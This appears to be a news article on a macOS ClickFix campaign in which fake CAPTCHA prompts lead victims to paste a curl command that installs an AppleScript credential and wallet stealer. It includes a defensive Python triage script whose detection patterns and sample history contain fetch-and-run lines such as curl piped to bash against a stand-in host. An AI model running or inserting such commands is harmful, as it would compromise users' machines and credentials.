The Register

macOS ClickFix attacks deliver AppleScript stealers to snarf credentials, wallets

A ClickFix campaign targeting macOS users delivers an AppleScript-based infostealer that collects credentials and live session cookies from 14 browsers, 16 cryptocurrency wallets, and more than 200 extensions.

Netskope Threat Labs researcher Jan Michael Alcantara told The Register the team initially observed the campaign last month, and has seen similar instances as recently as last week.

ClickFix is a super popular social engineering tactic used to trick people into executing malicious commands on their own computers, usually by clicking a fake computer problem fix or CAPTCHA prompt.

While the researchers don’t know who the cookie thief is, they note the malware can infect both Windows and macOS machines – Netskope previously warned about the Windows-focused attacks – by using a client-side JavaScript to filter victims by user-agent, ignoring mobile devices and directing desktop users to either a Windows or macOS-specific payload.

Victims, we’re told, are in Asia and work in the finance sector.

Upon detecting a desktop environment, the malware directs users to a fake CAPTCHA page, performs another inspection to determine the specific desktop OS, and checks the user-agent for macOS-specific strings before loading the AppleScript-based stealer.

The fake CAPTCHA prompts the user to open Spotlight on their Mac, and then paste a “verification code” into the search feature. The phony code is a curl command, and as soon as the victim hits Enter and executes it on their computer, the command silently downloads a malicious script from the attacker-controlled server. The script collects the victim’s username, hardcodes the command-and-control (C2) server address, and creates a temporary directory at /tmp/xdivcmp/ to stage all of the stolen data before sending it to the C2.
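The two host-side artifacts the article gives a defender to look for are the pasted curl one-liner and the /tmp/xdivcmp/ staging directory. The following triage script is an added example written for this piece, not code from Netskope or from the campaign: it scans shell-history lines and a filesystem listing for those artifacts. The staging path comes from the article; the curl-piped-to-shell and `bash -c "$(curl …)"` patterns are an assumed generalisation, since the exact form of the pasted command is not given, and the sample history lines and paths are constructed.

```python
import os
import re
from dataclasses import dataclass

# Staging directory named in the Netskope write-up (the one page-specific IoC available).
STAGING_DIR = "/tmp/xdivcmp"

# Assumed patterns (not from the article, which only says "a curl command"):
#  1. curl output piped straight into a shell or into osascript (AppleScript runner)
#  2. a shell invoked with -c on a command-substituted curl fetch
CURL_PIPE_RE = re.compile(
    r"\bcurl\b[^|;&]*\|\s*(?:sudo\s+)?(?:bash|zsh|sh|osascript)\b"
)
CURL_SUBST_RE = re.compile(r"\b(?:bash|zsh|sh)\s+-c\s+[\"']?\$\(\s*curl\b")


@dataclass
class Finding:
    source: str    # where the hit came from, e.g. "history:2" or "filesystem"
    detail: str    # the offending line or path
    reason: str    # which indicator matched


def scan_history(lines):
    """Flag shell-history lines that match the ClickFix-style fetch-and-run shape
    or that reference the staging directory. Returns a list of Findings."""
    findings = []
    for n, line in enumerate(lines, 1):
        stripped = line.strip()
        if CURL_PIPE_RE.search(stripped) or CURL_SUBST_RE.search(stripped):
            findings.append(Finding(f"history:{n}", stripped, "curl piped into interpreter"))
        elif STAGING_DIR in stripped:
            findings.append(Finding(f"history:{n}", stripped, "references staging directory"))
    return findings


def scan_paths(paths):
    """Flag the staging directory itself or anything inside it (exact prefix,
    so /tmp/xdivcmpfoo is not a false positive)."""
    return [
        Finding("filesystem", p, "staging directory present")
        for p in paths
        if p.rstrip("/") == STAGING_DIR or p.startswith(STAGING_DIR + "/")
    ]


def read_history_file(path):
    """Read a shell history file if it exists; zsh history may have odd bytes."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.readlines()
    except OSError:
        return []


def triage_live_host():
    """Run both scans against the current machine (best effort, read-only)."""
    home = os.path.expanduser("~")
    lines = []
    for name in (".zsh_history", ".bash_history"):
        lines.extend(read_history_file(os.path.join(home, name)))
    paths = []
    if os.path.isdir(STAGING_DIR):
        paths.append(STAGING_DIR)
        for root, _dirs, files in os.walk(STAGING_DIR):
            paths.extend(os.path.join(root, f) for f in files)
    return scan_history(lines) + scan_paths(paths)


# Constructed sample input for an offline demonstration.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/verify.sh | bash",       # constructed
    "git pull",
    "bash -c \"$(curl -s https://example.invalid/run.txt)\"",    # constructed
    "osascript -e 'display dialog \"hello\"'",                   # benign on its own
    "open /tmp/xdivcmp/",                                        # constructed
]
SAMPLE_PATHS = ["/tmp/xdivcmp/", "/tmp/xdivcmp/cookies.db", "/tmp/xdivcmpfoo", "/tmp/other"]


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY) + scan_paths(SAMPLE_PATHS):
        print(f"[{f.source}] {f.reason}: {f.detail}")
    for f in triage_live_host():
        print(f"LIVE [{f.source}] {f.reason}: {f.detail}")
```

The history scan is deliberately narrow: a bare `osascript` call is normal on a Mac and is not flagged, only a curl fetch handed directly to an interpreter. Pairing this with the macOS paste warning the article mentions gives both a preventive and a retrospective check.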

Apple did not respond to The Register‘s inquiries for this story, but it’s important to note that the latest versions of macOS Tahoe (26.4) or macOS Sequoia include a new feature designed to block ClickFix attacks. It alerts users when they attempt to paste potentially malicious commands into the Terminal application, so update your operating system to help detect and prevent these types of ClickFix attacks.

But if a user is running an older OS version, or for some reason ignores the macOS warning and clicks the “paste anyway” option, the malware moves on to the credential-harvesting stage by deploying a very sneaky social engineering dialog box that loads the authentic macOS system lock icon from local resources. Users see the lock, think it’s a legit Apple dialog box, and then enter their system password.

The malware also takes extreme measures to force credential entry. It only has a single action button – there’s no option for users to close the dialog box window – and it keeps reappearing until the victim enters a valid password. 

This is what the malware steals

User passwords are validated in real time, using macOS’s directory services authentication, and if incorrect, the dialog box reappears, with this loop continuing until the person provides a correct password.

Next, it snarfs up all sorts of user data, including the macOS Keychain (which stores saved passwords, Wi-Fi credentials, secure notes, and cryptographic keys), while the malicious dialog loop captures the victim’s password in plaintext.

The stealer also targets 12 Chromium-based browsers: Chrome, Brave, Edge, Vivaldi, Opera, Opera GX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, and CocCoc. For each of these, it searches user profiles and steals session tokens, authentication cookies, saved passwords and other autofill info including credit card numbers, data from more than 200 browser extensions, and extension databases.

This browser-extension theft is especially insidious as the miscreants’ malware is configured to swipe details from cryptocurrency wallets including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, and dozens of blockchain-specific ones. It also collects password manager credentials from LastPass, 1Password, Dashlane, Bitwarden, two-factor authentication apps including Authy and Google Authenticator extensions, and various VPN and single sign-on extensions used for corporate access.

In addition to the Chromium browser data, the malware steals cookie databases, form-autofill data, master passwords, and saved credentials from Firefox and Waterfox, another Firefox-based browser.

And beyond browser extensions, the stealer targets 16 standalone desktop cryptocurrency wallet applications: Exodus, Atomic, Electrum, Coinomi, Guarda, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, Dash Core, Dogecoin Core, Monero, Wasabi, Sparrow, Electron Cash, and Electrum-LTC.

Alcantara told us that this infostealer campaign is unrelated to one that also targeted macOS users’ credentials and cryptocurrency wallets that Microsoft last week attributed to North Korean criminals despite similar techniques – such as using social engineering even when malware is running.

Netskope has published a full list of indicators of compromise and scripts related to this malware in its GitHub repository, so give that a read. And as the threat hunters note, “this campaign serves as a reminder that social engineering remains a primary threat to both Windows and macOS users.” ®
